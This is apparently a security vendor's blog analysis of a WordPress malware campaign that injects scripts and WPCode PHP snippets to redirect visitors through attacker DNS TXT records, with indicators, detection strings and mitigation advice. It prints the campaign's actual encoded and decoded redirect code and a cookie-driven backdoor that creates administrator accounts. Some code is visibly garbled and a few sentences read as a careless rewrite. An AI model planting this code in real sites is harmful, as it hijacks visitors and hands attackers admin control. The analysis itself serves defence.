There’s a new harmful campaign attacking WordPress sites. It added dangerous JavaScript code to these sites, which then sent visitors to harmful VexTrio domains. What’s interesting about this malware is that it used dynamic DNS TXT records from the tracker-cloud[.]com domain to get new redirect URLs.

Since then, we’ve observed how the campaign is changing the way it hides its actions and the domain names it uses to direct traffic.

In March, there was a major change when the campaign started redirecting traffic through the server instead of the client side.

In this article, we will explore these recent changes in methods and functions. We will also highlight common signs of a security breach and malicious domains to be cautious of. Plus, we will offer steps to reduce the risk and protect your website and server from these threats.

Exploring Scope and Detection

The most infections were found in February 2024, when 9,222 sites were infected in just that month. Right now, a URLScan.io search shows that thousands of websites are still infected with this malware.

DNS Traffic Distribution System (TDS) Domain Names

The following domain names are used as Traffic Distribution System (TDS) with dynamic DNS resolvers:

1. cloud-stats[.]com: This domain was created on March 13, 2024, and has been in use since March 13, 2024.
2. host-stats[.]io: Created on March 5, 2024, this domain has been operational since March 5, 2024.
3. logsmetrics[.]com: Created on December 6, 2023, it has been in use since December 18, 2023.
4. ads-promo[.]com: Created on August 23, 2023, it has been operational since October 13, 2023.
5. tracker-cloud[.]com: Created on July 12, 2023, this domain has been in use since July 17, 2023.

Redirects On Client-side

Here’s a glimpse into the latest iteration of client-side injection techniques: a method commonly used by cyber attackers to compromise websites and spread malware. Take a closer look at how malicious scripts are injected into web pages, posing a serious threat to online security.

<script src="data:text/javascript;base64, KGZ1bmN0aW9uIChwYXJhbWV0ZXJzKSB7DQogICAgZm
V0Y2goJ2h0dHBz0i8vYXBpNjQuaXBpZnkub3JnP2Zvcm1hdD1qc29uJykudGhlbihyZXNwb25zZSA9PiByZ
XNwb25zZS5qc29uKCkpLnRoZW4oDQogICAgICAgIGlwIDO+IHsNCiAgICAgICAgICAgIGxldCBob3N0ID0g
d2luZG93LmxvY2F0aW9uLmhvc3RuYW1l0w0KICAgICAgICAgICAgaXAgPSBpcC5pcC5yZXBsYWNlQWxsKCc
6JywgJy0nKTsNCiAgICAgICAgICAgIGlwID0gaXAucmVwbGFjZUFsbCgnLicsICctJyk7DQogICAgICAgIC
AgICBpZiAoaG9zdCA9PSAiIikgaG9zdCA9ICJ1bmsuY29tIjsNCiAgICAgICAgICAgIGZldGNoKCdodHRwc
zovL2Rucy5nb29nbGUvcmVzb2x2ZT9uYW1lPScgKyBob3N0ICsgJy4nICsgaXAgKyAnLicgKyBNYXRoLmZs
b29yKE1hdGgucmFuZG9tKCkgKiAxMDI0ICogMTAyNCAqIDEWKSArICcuaG9zdC1zdGF0cy5pbyZ0eXBlPXR
4dCcpLnRoZW40cmVzcG9uc2UgPT4gcmVzcG9uc2UuanNvbigpKS50aGVuKGRhdGEgPT4gew0KICAgICAgIC
AgICAgICAgIGlmIChkYXRhLkFuc3dlciA9PSBudWxsKSB7DQogICAgICAgICAgICAgICAgICAgIHJldHVyb
jsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgdmFyIG8gPSAiIjsNCiAgICAgICAgICAg
ICAgICBkYXRhLkFuc3dlci5mb3JFYWNoKGVsZW1lbnQgPT4gew0KICAgICAgICAgICAgICAgICAgICBpZiA
oZWxlbWVudC50eXBlID09IDE2KSBvICs9IGVsZW1lbnQuZGF0YTsNCiAgICAgICAgICAgICAgICB9KTsNCİ
AgICAgICAgICAgICAgICBvIDOgYXRvYihvKTsNCiAgICAgICAgICAgICAgICBpZiAoIW8ubGVuZ3ROKSBYZ
XR1cm47DQogICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2Uobyk7DQogICAgICAgICAg
ICB9KTsNCiAgICAgICAgfQOKICAgICk7DQp9KSgp"></script>

Unraveling the code reveals the utilization of dns.google service to fetch TXT records of dynamically generated subdomains linked to the attacker’s domain. This technique enhances cyber threat detection and mitigation strategies.

(function (parameters) {
    fetch('https://api64.ipify.org?format=json').then(response => response.json()).then(
        ip => {
            let host = window.location.hostname;
            ip = ip.ip.replaceAll(':', '-');
            ip = ip.replaceAll('.', '-');
            if (host == "") host = "unk.com";
            fetch('https://dns.google/resolve?name=' + host + '.' + ip + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.host-stats[.]io&type=txt').then(response => response.json()).then(data => {
                if (data.Answer == null) {
                    return;
                }
                var o = "";
                data.Answer.forEach(element => {
                    if (element.type == 16) o += element.data;
                });
                o = atob(o);
                if (!o.length) return;
                window.location.replace(o);
            });
        }
    );
})()  

Here’s what you can expect from the dns.google server:

{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.","type":16}],"Answer":[{"name":"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.","type":16,"TTL":600,"data":"aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw"}],"Comment":"Response from 185.161.248[.]253."}

In the data parameter, we uncover a base64-encrypted string: aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw. This decodes to a suspicious link: hxxps://web-hosts[.]io/?co1kioijvq327hhn96v0.

Since March, web-hosts[.]io has been consistently utilized in redirecting users as part of a malware campaign. Noteworthy is the IP address linked: 185.161.248[.]253 (KISARA-AS, RU), hosting numerous domains involved in this malware’s redirection tactics.

Redirects On Server-side

After March 13, 2024, a noticeable trend emerged: website visitors were being redirected to the same destination, web-hosts[.]io. Surprisingly, this time, the redirects were executed server-side without any involvement of JavaScript injections.

Upon thorough investigation, we uncovered the source of these server-side redirects. It was a PHP adaptation of a notorious JavaScript injection method seen in previous cyber-attacks. The attackers utilized a similar approach, embedding a custom code snippet within the WPCode plugin (formerly Insert Headers and Footers by WPBeginner), a popular tool with over 2 million installations worldwide.

As per statistics from the official WordPress plugin repository, WPCode facilitates the injection of custom JavaScript, HTML, CSS, and PHP code snippets into WordPress websites. However, in this instance, attackers abused compromised systems to install this plugin surreptitiously.

Unlike previous tactics involving JavaScript snippets, the attackers opted for PHP snippets to cloak their malicious activities. This strategy rendered the malicious code invisible to external scanners, as only the redirect itself could be detected. Moreover, the intricacies of the Traffic Distribution System (TDS) logic, which tracks visitor IPs, added another layer of complexity, making it challenging to replicate the redirects.

Malicious PHP Snippets within WPCode

Let me illustrate how harmful code, sneaked in as a WPCode PHP snippet, can lurk within the WordPress admin interface, posing a threat to your website’s security and functionality.

/>WPCode
Edit Snippet
Untitled Snippet
Code Preview

<?php
1 $p0=base64 decode('MjMyZThlZTg2MGY3N2VmMDZjNGQ5NWFhZTIzOTU4NGU='); if(current user can (base64 decode('YWRtaW5pc3R yYXRvcg==)) &&!array key exists(base64 decode('c2hvd19hbGw='),S GET))
{add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg=='); echo base64 decode('13RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ=='); echo
base64 decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF50iBub2510y89'); echo
base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ=='); echo
base64_decode('PC9zdHlsZT4=');}); add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($q1)
(
unset($q1[base64 decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]); return $ql;});}if(!function_exists(base64 decode('X3J1ZA==')))
{error_reporting(0); ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0); function gcookie($p2)
{return(isset($ COOKIE[$p2]))?

You can now spot these useful snippets marked as ‘Untitled Snippets.’

Injected code may change slightly across websites, yet its fundamental function remains unchanged. Let’s explore a simple example:

if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0); ini_set(base64_decode('
ZGlzcGxheV9lcnJvcnM='),0); function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm
9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZ
XxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8 d2Vib3N8d29zKS9p'), $_SERVER [base64_decode('SFRUUF9VUØVSX0FHRU5U')]); } function is iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='), $_SERVER[base64_decode('SFRUUF9VUØVSX0FHRU5U*) ]); } function _user_ip() {foreach(array(base64_decode('SFRUUF9DR19DT050RUNUSUSHX0lQ'), base64_decode(' SFRUUF9DTELFTlRfSVA='), base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='), base64_decode(' SFRUUF9YXOZPUldBUKRFRA=='), base64_decode('SFRUUF9YX0NMVVNURVJfQ0XJRU5UX0lQ'),base64_decode(' SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI=')) as $co){if(array_key_exists($c0, $_SERVER) &&!empty($_SERVER[$c0])){foreach(explode(base64_decode(' LA=='), $_SERVER[$c0])as $q1){$q1=trim($q1); if(filter_var($q1, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)!==false){return $q1;}}}}return false;}function _red(){if(!is_user_logged_in()){$q1=_user_ip();if(!$q1){return;}$k2=get_transient(base64_decode(' ZXhw')); if(!is_array($k2)){$k2=array(); } foreach($k2 as $g3=>$14){if(time()-$14>86400){unset($k2 [$g3 ]);}}if(key_exists($q1,$k2)&&(time()-$k2[$q1]<86400)){return;}$y5=filter_var(parse_url( base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN); $v6=str_replace(base64_decode('0g=='), base64_decode('LQ=='),$q1); $v6= str_replace(base64_decode('Lg=='), base64_decode('LQ=='), $v6); $h7=_is_iphone()?base64_decode('aQ== ') : base64_decode('bQ=='); $o8=(!$y5?base64_decode('dW5rLmNvbQ='):$y5).base64_decode('Lg==').(!$v6? base64_decode('MCOWLTATMA=='): $v6).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg== ').(_is_mobile()?base64_decode('bg==').$h7: base64_decode('bmQ=')).base64_decode(' LmNsb3VkLXN0YXRzLmNvbQ=='); $u9=dns_get_record($08, DNS_TXT); if(is_array($u9)&&!empty($u9)){if(isset( $u9 [0] [base64_decode('dHh0')])){$u9=$u9 [0] [base64_decode('dHh0')]; $u9=base64_decode($u9); if($u9 base64_decode('ZXJy')){$k2[$q1]=time();set_transient(base64_decode('ZXhw'),$k2); }else if (substr($u9 ,0,4)==base64_decode('aHR0cA==')){$k2 [$q1]=time(); set_transient(base64_decode('ZXhw'),$k2); wp_redirect($u9); exit;}}}}} add_action(base64_decode('aW5pdA=='), base64_decode('X3JLZA==')); }

Discovering more advanced versions of this issue might require a closer look. While they may contain extra code, they often stand out due to heavy reliance on the base64_decode function for decoding strings.

To identify these, consider manually scanning your database for the following suspicious strings:

add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));

The string is decoded to:

add_action('init','_red');

And:

if(!function_exists(base64_decode('X3JlZA=='))){

That decodes to:

if(!function_exists('_red')){

Another clear indication that your website might be infected is the presence of the DNS_TXT flag within the dns_get_record() function. When you see this flag, it’s like a red flag waving, signaling potential trouble. This function is a tool used to gather information about DNS records, and when the DNS_TXT flag appears, it often means that your site’s DNS records have been tampered with or compromised. This could lead to security breaches or unauthorized access to your website. If you notice this flag, it’s crucial to take immediate action to investigate and resolve any potential security threats. Ignoring it could leave your website vulnerable to further attacks and damage.

dns_get_record($p9,DNS_TXT);

Note :Please be aware that the variable name used in the example below might vary depending on the website you’re working with. This is common practice across different sites and platforms.

Basic Functionality of Redirect

When decoded, the critical segment of the malware appears as follows:

function _red(){
if(!is_user_logged_in()){
$q1=_user_ip();
if(!$q1){
return;
}
$k2=get_transient('exp');
if(!is_array($k2)){
$k2=array();
}
foreach($k2 as $g3=>$14){
if(time()-$14>86400){ // more than 24 hours
unset($k2 [$g3]);
}
}
if (key_exists($q1,$k2)&&(time()-$k2[$q1]<86400)) { //less than 24 hours
return;
}
$y5=filter_var(parse_url('https://'.$_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN);
$v6=str_replace(':','', $q1);
$v6=str_replace('.', '-', $v6);
$h7=_is_iphone()?'i':'m';
$08=(!$y5?'unk.com':$y5).'.'.(!$v6?10-0-0-0':$v6).'.'.mt_rand(100000,999999)..(
_is_mobile()?'n'.$h7: 'nd').'.cloud-stats.com';
$u9=dns_get_record($08,DNS_TXT);
if(is_array($u9)&&!empty($u9)){
if(isset($u9[0]['txt'])){
$u9=$u9 [0]['txt'];
$u9-base64_decode($u9);
if($u9='err') {
$k2[$q1]=time();
}
set_transient('exp', $k2);
else
if(substr($u9,0,4)='http'){
$k2[$q1]=time();
set_transient('exp',$k2);
wp_redirect($u9);
exit;
}
}
}
}
}
add_action('init','_red');

Here’s a useful piece of code that sets up the _red() function to execute whenever a webpage loads, just before it sends any headers.

This function is cleverly designed to check if the visitor is not logged in (a tactic to avoid detection by site owners) and whether it’s their first visit within the past 24 hours.

A Request related to DNS TXT Record

When these certain conditions are fulfilled, the malware creates a unique subdomain on the attacker’s domain, ‘cloud-stats[.]com’. Following this, it asks for the TXT record of this generated subdomain:

$o8=(!$y5?'unk.com':$y5).'.'.(!$v6?'0-0-0-0':$v6).'.'.mt_rand(100000,999999).’.’.(_is_mobile()?'n'.$h7:'nd').'.cloud-stats[.]com';
$u9=dns_get_record($o8,DNS_TXT);

Here’s what makes up the generated subdomain:

• The domain name of the infected site (or ‘unk.com’ if it can’t be identified’)
• The IP address of the visitor, but with periods and colons replaced by dashes
• A random number ranging from 100,000 to 999,999
• A platform marker indicating the device used:
  • ‘ni’ for iPhones
  • ‘nm’ for other mobile devices
  • ‘nd’ for desktops (not mobile)
• The primary domain, controlled by attackers, is cloud-stats[.]co

Putting it all together, a fully generated subdomain might look like this: www.example.com.127-0-0-1.243385.ni.cloud-stats[.]com

URL Redirection within TXT Records

Here is the particular response to the TXT record requests of malware:

type:  16 aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NucG43YmFqdnEzZTdvNWtxNXQw;type:  2 ns1.cloud-stats[.]com;type:  2 ns2.cloud-stats[.]com;95.216.232.139;185.161.248.253;

Discovering the redirect URL (hxxps://web-hosts[.]io/?cnpn7bajvq3e7o5kq5t0), encoded as a base64 string aHR0cHM6Ly93ZWItaG9…, reveals crucial information. Additionally, we uncover the IPs of the name servers: the well-known 185.161.248[.]253 (KISARA-AS, RU) and 95.216.232[.]139 (HETZNER-AS, DE).

Once the redirect URL is fetched from the cloud-stats[.]com DNS server, visitors are automatically rerouted there through the wp_redirect function.

Elusive Techniques and Backdoor Functionality

Injected PHP scripts may come with extra functionalities. One frequent addition is code that conceals the WPCode plugin (insert-headers-and-footers/ihaf.php) within the installed plugins list.

This tactic thwarts detection and deactivation attempts by website owners who didn’t install the plugin themselves. An unintended consequence is that even legitimate users of the plugin may find it hidden.

To further obscure the WPCode plugin, the malware modifies its notifications and messages on the WordPress dashboard, making them invisible by altering their display styles to { display: none; }.

Backdoor That is Cookie Based

Newer versions of this malicious software boast added features, including a backdoor function enabling attackers to transmit data to the script through base64-encoded cookies:

function _gcookie($z2){
}
return(isset($_COOKIE [$z2]))?base64_decode($_COOKIE [$z2]):'';
if(!empty($d0)&&_gcookie('pw')===$d0){
switch(_gcookie('c')){
case 'sd':
$e3=_gcookie('d');
if (strpos($e3,'.')>0){
update_option('d', $e3);
}
break;
case 'au':
$e4=_gcookie('u');
$15=_gcookie('p');
$p6=_gcookie('e');
if($e4&&$15&&$p6&&!username_exists($e4)){
$w7=wp_create_user($e4, $15, $p6);
$x8=new WP_User($w7);
$x8->set_role('administrator');
}
break;
}
return;
}

have a look on the Crucial Functions of this Backdoor at this point:

• Dynamic Domain Update (sd): Seamlessly updates the primary DNS TDS domain and securely stores it in WordPress. A single discreet GET request can swap out the domain, ensuring easy concealment.
• Admin User Creation (au): Allows the unauthorized creation of a malicious WordPress admin user, compromising website security. These functionalities pose a severe threat to website integrity. Take proactive steps to protect your online assets.

Persistence of Malware

Did you know? A recent malware campaign is wreaking havoc by installing the WPCode plugin onto unsuspecting websites. This plugin serves as a gateway for cyber attackers to inject their own custom JS and PHP code, compromising site security.

Our analysis, based on logs from various affected sites, reveals a troubling pattern. While it remains uncertain which vulnerability initially allowed this malware to infiltrate, our investigation pinpointed its activity to the moment attackers gain access to WordPress and install the WPCode plugin using valid admin credentials.

What’s truly alarming is the meticulous effort these attackers put in to ensure their malware remains undetected. After infecting a site, their bots diligently revisit it daily, sometimes even multiple times a day, to log into WordPress and verify the WPCode plugin’s activation status. In a remarkable display of persistence, we observed an instance where a site owner deactivated the plugin, only to have it reactivated by the attacker’s bot a mere two hours later!

Furthermore, our research uncovers another tactic employed by these malicious actors. They’re also experimenting with a similar plugin called ‘Head, Footer and Post Injections,’ using it as a backup plan. While this plugin serves the same purpose of allowing custom JS and PHP injections, it’s yet to become the primary tool in their arsenal.

User-Agents and Proxies

Discovering the origins of harmful bot requests reveals a diverse network of residential IPs spanning the globe, such as:

• Mexico
• Pakistan
• Brazil
• Egypt
• Thailand
• Kenya
• Morocco
• Serbia
• etc.

These requests likely stem from compromised computers or public proxies, highlighting the widespread impact of cyber threats worldwide.

The User-Agent strings of all these requests differ very much, but you should typically use the older versions of browsers:

"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
"Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2265.141 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.70"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"

In online sessions, it’s common for your device’s identification (User-Agent) and internet location (IP address) to switch. For example, you might log in with one IP address and see another IP address accessing your /wp-admin/ URLs soon after, using a different User-Agent. This behavior often indicates the use of a proxy, which masks the original IP address. Understanding this can help you ensure the security of your online activities.

Steps Of Mitigation

Protect your website from cyber threats by taking proactive measures. Web hosts play a crucial role in safeguarding against malicious activities. By sinkholing domain names linked to suspicious activities, like DNS DTS, and blocking their associated name servers, such as cloud-stats[.]com, ns1.cloud-stats[.]com, and ns2.cloud-stats[.]com, the risks can be significantly reduced.

As a website owner, here’s what you can do to fortify your site:

• Strengthen your WordPress admin passwords with unique and robust credentials for each account.
• Regularly check for unfamiliar WordPress users and remove them promptly through the WordPress dashboard or database inspection.
• If you’re using the WPCode plugin, thoroughly examine all installed code snippets and delete any that seem suspicious or unnecessary.
• Audit all installed plugins to ensure they are legitimate. Some plugins may hide in directories like insert-headers-and-footers/ and header-footer/. Remove any plugins that don’t belong.
• Keep all plugins and themes updated to the latest versions to patch known vulnerabilities. If updates aren’t possible immediately, consider employing a web application firewall for virtual patching.

By following these steps, you can bolster your website’s defenses and keep it safe from potential threats. Stay vigilant and proactive to maintain a secure online presence.

Conclusion

Having trouble with your website? Talk to us now! Our skilled security team at ElySpace is available 24/7 to handle malware problems, clean up your site, and fix it. Contact us anytime for quick help and to get your website working again!